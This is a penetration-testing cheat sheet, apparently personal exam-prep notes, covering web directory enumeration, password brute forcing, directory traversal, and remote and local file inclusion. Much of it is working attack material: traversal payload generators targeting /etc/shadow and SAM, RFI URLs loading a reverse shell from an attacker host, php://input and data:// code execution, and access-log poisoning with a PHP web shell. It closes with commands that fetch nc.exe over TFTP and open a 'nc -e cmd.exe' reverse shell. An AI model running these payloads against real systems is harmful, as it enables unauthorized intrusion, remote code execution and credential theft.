Web Server Enumeration

WEB
PORT 80
PORT 443

…web server ports are not limited to these, look for open http services
…multiple attack vectors

dirb http://10.10.1.299

dirb http://10.10.1.299:8080 -o file.txt  # PUT THE PORT IN THE URL TO SCAN OTHER PORTS (-p IS A PROXY, -P IS PROXY CREDS, NOT A TARGET)

dirbuster  # GUI USED TO ENUMERATE

gobuster dir -u http://10.10.1.299:8080 -w wordlist.txt
# TAKES A WHILE (~220K words)
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# QUICKER (~87K words)
/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
# QUICKEST (~5K words)
/usr/share/wordlists/dirb/common.txt
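Added helper for the point made above that web services live on more than 80/443: it pulls every http-looking service out of nmap grepable (-oG) output and emits one gobuster line per URL. This is example code written for these notes, not part of nmap or gobuster; the scan output below is constructed, and the wordlist path is just the default from the list above.

```python
"""Turn nmap -oG output into gobuster targets (added example, not a page tool)."""
import re
from typing import List

# Constructed sample of `nmap -sV -oG -` output (not a real scan).
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sV -oG - 10.10.1.5
Host: 10.10.1.5 ()  Status: Up
Host: 10.10.1.5 ()  Ports: 22/open/tcp//ssh//OpenSSH 8.2p1/, 80/open/tcp//http//Apache httpd 2.4.41/, 443/open/tcp//ssl|http//Apache httpd 2.4.41/, 8080/open/tcp//http-proxy//Jetty/, 8443/open/tcp//ssl|https-alt//nginx/, 3306/open/tcp//mysql//MySQL 5.7/
# Nmap done
"""

# -oG port field layout: port/state/proto/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/open/tcp//([^/]*)//")


def http_targets(gnmap: str) -> List[str]:
    """Return http(s)://host:port for every open TCP port whose service name
    mentions http. 'ssl|' or 'https' in the name selects the https scheme."""
    urls = []
    for line in gnmap.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1]
        for port, service in PORT_RE.findall(ports_field):
            if "http" not in service:
                continue
            scheme = "https" if ("ssl" in service or "https" in service) else "http"
            urls.append(f"{scheme}://{host}:{port}")
    return urls


def gobuster_commands(urls: List[str],
                      wordlist: str = "/usr/share/wordlists/dirb/common.txt") -> List[str]:
    """One gobuster dir line per URL, using the quick wordlist by default."""
    return [f"gobuster dir -u {u} -w {wordlist}" for u in urls]


if __name__ == "__main__":
    for cmd in gobuster_commands(http_targets(SAMPLE_GNMAP)):
        print(cmd)
```

Feed real output with `nmap -sV -oG scan.gnmap ... && python3 targets.py < scan.gnmap` after swapping the constant for `sys.stdin.read()`; for https targets add `-k` to gobuster if the certificate is self-signed.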

medusa -h 10.10.1.299 -u admin -P rockyou.txt -M http -m DIR:/admin  # BRUTE FORCE HTTP BASIC AUTH ON /admin

DIRECTORY TRAVERSAL

REMOTE FILE INCLUSION

LOCAL FILE INCLUSION

SQL INJECTION

# WordPress Enumeration if found
wpscan --url http://10.10.1.299 --passwords /usr/share/wordlists/rockyou.txt --usernames admin
[!] Valid Combinations Found:
 | Username: admin, Password: password

DIRECTORY TRAVERSAL

…you may be able to read files on the server
…you step up toward the filesystem root with "../../../" (or "..\..\..\" on Windows)
…then append the path of the file you want to read

https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

…you can look for very common files on a system

WINDOWS
C:\windows\win.ini 
C:\windows\system.ini
C:\windows\iis.log
C:\windows\System32\Drivers\etc\hosts
C:\Windows\system32\config\SYSTEM
C:\windows\debug\netsetup.log
C:\windows\debug\sammui.log
C:\windows\debug\netlogon.log
C:\windows\debug\passwd.log
C:\windows\system32\winevt\logs\system.evtx
C:\windows\system32\winevt\logs\Windows Powershell.evtx
C:\windows\WindowsUpdate.log
C:\windows\system32\calc.exe
C:\windows\system32\windowspowershell\v1.0\powershell.exe
C:\windows\ccm\logs\filesystemfile.log
C:\users\administrator\appdata\local\recently-used.xbel
C:\users\administrator\desktop\desktop.ini
C:\windows\panther\unattended.xml
C:\windows\panther\unattended\unattended.xml
C:\windows\repair\sam
C:\windows\system32\tasks\daily
C:\windows\panther\sysprep.inf

LINUX
/etc/passwd
/etc/shadow
/etc/crontab
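Added example for the traversal notes above: it builds the usual payload variants for one of the files listed (plain, backslash, URL-encoded, doubled-dot and null-byte forms) and recognises a successful read from the response body by a marker that reliably appears in that file. This is example code written for these notes, not from any tool on the page; the marker strings are my own choices for the plain-text files above, and the response bodies are constructed.

```python
"""Traversal payload variants plus a success check (added example)."""
from typing import Dict, List
from urllib.parse import quote

# A string that appears in each (plain-text) file from the lists above.
MARKERS: Dict[str, str] = {
    "/etc/passwd": "root:x:0:0:",
    "/etc/shadow": "root:",          # hash or '!'/'*' lock, but the line starts with root:
    "/etc/crontab": "SHELL=",
    r"C:\windows\win.ini": "[fonts]",
    r"C:\windows\system.ini": "[drivers]",
}


def traversal_payloads(target: str, depth: int = 6) -> List[str]:
    """Variants of the ../ chain to try when the obvious one is filtered."""
    # drop the drive letter / leading slash so the ../ chain lands on the root
    rel = target.replace("C:\\", "").lstrip("/").replace("\\", "/")
    return [
        "../" * depth + rel,                      # plain
        "..\\" * depth + rel.replace("/", "\\"),  # backslashes (Windows targets)
        quote("../" * depth + rel, safe=""),      # fully URL-encoded
        "%2e%2e/" * depth + rel,                  # dots encoded, slashes not
        "....//" * depth + rel,                   # survives one non-recursive strip of "../"
        "../" * depth + rel + "%00",              # null-byte truncation (PHP < 5.3.4 only)
    ]


def read_succeeded(target: str, body: str) -> bool:
    """True if the response body carries the marker for that file."""
    marker = MARKERS.get(target)
    return marker is not None and marker in body


# Constructed responses, not captured from a real host
OK_PASSWD = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
OK_WININI = "; for 16-bit app support\n[fonts]\n[extensions]\n[mci extensions]\n[files]\n"
DENIED = "<html><body>File not found</body></html>"

if __name__ == "__main__":
    for p in traversal_payloads("/etc/passwd", depth=3):
        print("?filename=" + p)
    print(read_succeeded("/etc/passwd", OK_PASSWD), read_succeeded("/etc/passwd", DENIED))
```

Loop the payload list through the vulnerable parameter (curl or Burp Intruder) and stop at the first body that passes `read_succeeded`; a 200 with the original page content is the usual false positive, which is why the check keys on file content rather than status code.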

REMOTE FILE INCLUSION (RFI)

… you may be able to reference a file on your own server via the web request
… look for a page or file request (?page=)
… URL encoding may be done through BurpSuite Decoder

http://10.10.1.299/section.php?page=http://192.168.119.299:443/revshell.php

# EXAMPLE USING ACS WITH A NULL BYTE (%00) AT THE END TO DROP WHATEVER THE APP APPENDS TO THE PATH
http://10.11.1.8/internal/advanced_comment_system/index.php?ACS_path=http%3A%2F%2F192.168.119.188%3A443%2Fshell.php%00
# EXAMPLE USING CURL AND THE php://input WRAPPER (POST BODY IS EXECUTED AS PHP; $CMD IS SET IN YOUR SHELL)
curl -s --data "<?php system('$CMD'); ?>" 'http://10.11.1.8/internal/advanced_comment_system/admin.php?ACS_path=php://input%00'

LOCAL FILE INCLUSION (LFI)

… if you can write attacker-controlled text into a file the app will include (a log, a session file, an upload), you can get code execution
… usually found after Directory Traversal already works on the same parameter
… URL encoding may be done through BurpSuite Decoder

# DIRECTORY TRAVERSAL WORKED
?file=../../../../../../../var/log/httpd/access_log
# SO LFI -> RCE BY POISONING THAT LOG (BELOW), OR, IF allow_url_include IS ON, VIA THE data:// WRAPPER
?file=data:text/plain,<?php echo shell_exec("dir") ?>
# OTHER PARAMETERS WORTH TRYING
?helpfile=../secret/.htpasswd
?download=brochure.pdf
?download=../include/connection.php
# URL ENCODE THROUGH BURPSUITE DECODER
?file=data:text/plain,%3C?php%20echo%20shell_exec(%22id%22)%20?%3E

# MORE LOG POISONING TECHNIQUES

# NULL BYTE TRUNCATION (DROPS AN EXTENSION THE APP APPENDS; ONLY WORKS ON PHP < 5.3.4)
param=../../../../../../etc/passwd%00

# Default Locations                          ACCESS LOG                    ERROR LOG
RHEL / Red Hat / CentOS / Fedora (Apache)    /var/log/httpd/access_log     /var/log/httpd/error_log
Debian / Ubuntu (Apache)                     /var/log/apache2/access.log   /var/log/apache2/error.log
FreeBSD (Apache)                             /var/log/httpd-access.log     /var/log/httpd-error.log

# For custom log locations, find the "CustomLog" and "ErrorLog" definitions within these files:
/usr/local/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf

# Windows web roots
C:/xampp/htdocs/
C:/wamp/www/
C:/Inetpub/wwwroot/

# CONNECT AND POISON (RAW SOCKET SO THE PHP TAG IS NOT URL-ENCODED; THE LINE LANDS IN access.log AS THE REQUEST. KEEP DOUBLE QUOTES OUT OF THE PAYLOAD, APACHE LOGS THEM AS \")
$ nc 192.168.1.23 80
<?php echo shell_exec($_GET['cmd']);?>

# USE THE LANG PARAMETER TO INCLUDE THE POISONED ACCESS LOG, cmd IS PICKED UP BY THE PLANTED PHP
http://192.168.1.23/vulnerable.php?name=name&comment=&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00

# UPLOAD NETCAT WITH TFTP
http://192.168.1.23/vulnerable.php?name=name&comment=&cmd=tftp+-i+10.10.10.299+get+nc.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00

# EXECUTE NETCAT
http://192.168.1.23/vulnerable.php?name=name&comment=&cmd=nc.exe+10.10.10.299+80+-e+cmd.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00

RESTART WINDOWS

shutdown /r /t 0